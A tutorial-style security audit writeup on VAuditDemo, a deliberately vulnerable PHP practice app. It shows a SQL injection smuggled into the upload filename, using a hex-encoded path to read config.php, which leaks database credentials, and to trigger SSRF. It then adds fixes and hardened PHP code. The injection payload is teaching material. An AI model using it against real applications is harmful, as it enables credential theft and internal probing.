VAuditDemo - Arbitrary File Read (2)

Replay the request in Repeater and check whether the value 2 was written to the database; if it was, the injected statement executed.

9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 2 2020-04-11 127.0.0.1

Change 2 to ../../sys/config.php and check the database again: the filename field only accepts a bare file name, not a path.

9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 ../uploads/u_1586583208_config.php 2020-04-11 127.0.0.1

Hex-encode ../sys/config.php and try again; this time ../sys/config.php is written successfully.

filename="',user_avatar = 0x2F7379732F636F6E666967706870 WHERE user_name = 'test'#.png"   (note: the hex literal must carry the 0x prefix)

Result:

9 test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 ../sys/config.php 2020-04-11 127.0.0.1

The avatar is fetched at login time, so we can take the captured login request and the avatar request, change the session value in both, and replay them. The source of config.php then appears in the avatar response.

HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:03:34 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: image/jpeg
Content-Length: 552

<?php
// error_reporting(E_ALL);
error_reporting(0);
if (!file_exists($_SERVER["DOCUMENT_ROOT"].'/sys/install.lock')){
    header("Location: /install/install.php");
    exit;
}
include_once('../sys/lib.php');
$host="localhost";
$username="root";
$password="root";
$database="vauditdemo";
$conn = mysql_connect($host,$username,$password);
mysql_query('set names utf8',$conn);
mysql_select_db($database, $conn) or die(mysql_error());
if (!$conn) {
    die('Could not connect: ' . mysql_error());
    exit;
}
session_start();
?>

Next, test whether an SSRF vulnerability exists. Hex-encode the URL in the same way, then resend the login request and the avatar request. The response contains the HTML of Baidu's home page, which confirms the SSRF.

test a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 2020-04-11 127.0.0.1

HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:36:55 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: image/jpeg
Content-Length: 14616

<!DOCTYPE html><!--STATUS OK-->
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link rel="dns-prefetch" href="//s1.bdstatic.com"/>
<link rel="dns-prefetch" href="//t1.baidu.com"/>
<link rel="dns-prefetch" href="//t2.baidu.com"/>
<link rel="dns-prefetch" href="//t3.baidu.com"/>
<link rel="dns-prefetch" href="//t10.baidu.com"/>
<link rel="dns-prefetch" href="//t11.baidu.com"/>
<link rel="dns-prefetch" href="//t12.baidu.com"/>
<link rel="dns-prefetch" href="//b1.bdstatic.com"/>
<title>百度一下,你就知道</title>
<link href="http://s1.bdstatic.com/r/www/cache/static/home/css/index.css" rel="stylesheet" type="text/css" />
......

Vulnerability fix

Validate the contents of $_FILES.

Filter special characters out of filename.

Audit approach summary

1. file_get_contents reads $_SESSION['avater'].

2. $_SESSION['avater'] is taken from $row['user_avater'].

3. In updateAvater.php the avatar name is fetched from the database.

4. $avater is supplied by $_FILES['upfile']['name'].
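The two fixes listed above break the four-step chain at its first link (the upload name) and its last (the file read). The following is an added example written for this page, not VAuditDemo's own code: it assumes PHP 7.1 or later with mysqli, a users table with the user_name and user_avatar columns seen in the database rows above, and an uploads directory beside the script; the function names and the UPLOAD_DIR constant are hypothetical.

```php
<?php
// Added example (not VAuditDemo's code): hardened avatar upload name
// handling and avatar read. Assumes PHP >= 7.1 with mysqli, a `users`
// table with `user_name` / `user_avatar`, and an `uploads` directory.

const UPLOAD_DIR = __DIR__ . '/uploads';   // assumed location of stored avatars

/**
 * Reduce the client-supplied upload name to a server-generated name.
 * basename() drops any directory part, the extension is whitelisted,
 * and the stored name is built from values we control, so quotes,
 * "../", "#" or hex literals from the client never reach the database.
 */
function safeAvatarName(string $clientName, int $userId): ?string
{
    $base = basename($clientName);
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return null;                               // unexpected extension
    }
    return sprintf('u_%d_%d.%s', $userId, time(), $ext);
}

/**
 * Store the avatar name through a bound parameter, so the value can
 * never close the string literal and append its own WHERE clause.
 */
function storeAvatar(mysqli $conn, string $userName, string $avatarName): bool
{
    $stmt = $conn->prepare('UPDATE users SET user_avatar = ? WHERE user_name = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ss', $avatarName, $userName);
    return $stmt->execute();
}

/**
 * Resolve a stored avatar name to a file that must lie under UPLOAD_DIR.
 * Only a bare file name is accepted (no "/" and no ".."), so stream
 * wrappers such as http:// are rejected before file_get_contents runs,
 * and realpath() plus the prefix check stops any directory escape.
 */
function avatarPath(string $storedName): ?string
{
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $storedName) || strpos($storedName, '..') !== false) {
        return null;                               // not a plain file name
    }
    $root = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $storedName);
    if ($root === false || $real === false) {
        return null;                               // directory or file missing
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                               // resolved outside uploads/
    }
    return $real;
}

// Usage in the avatar-serving step (replacing the raw file_get_contents call):
// $path = avatarPath($_SESSION['avatar'] ?? '');
// if ($path === null) { http_response_code(404); exit; }
// header('Content-Type: image/jpeg');
// readfile($path);
```

With the name generated server-side, the database column can only ever hold a value of the form u_<id>_<timestamp>.<ext>, and avatarPath() treats anything else as absent rather than trying to open it; the SQL injection, the path traversal and the SSRF from the writeup are all closed off at the point where the attacker-controlled value would otherwise enter.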


Source (cite when reposting): https://www.heiqu.com/zyzdzz.html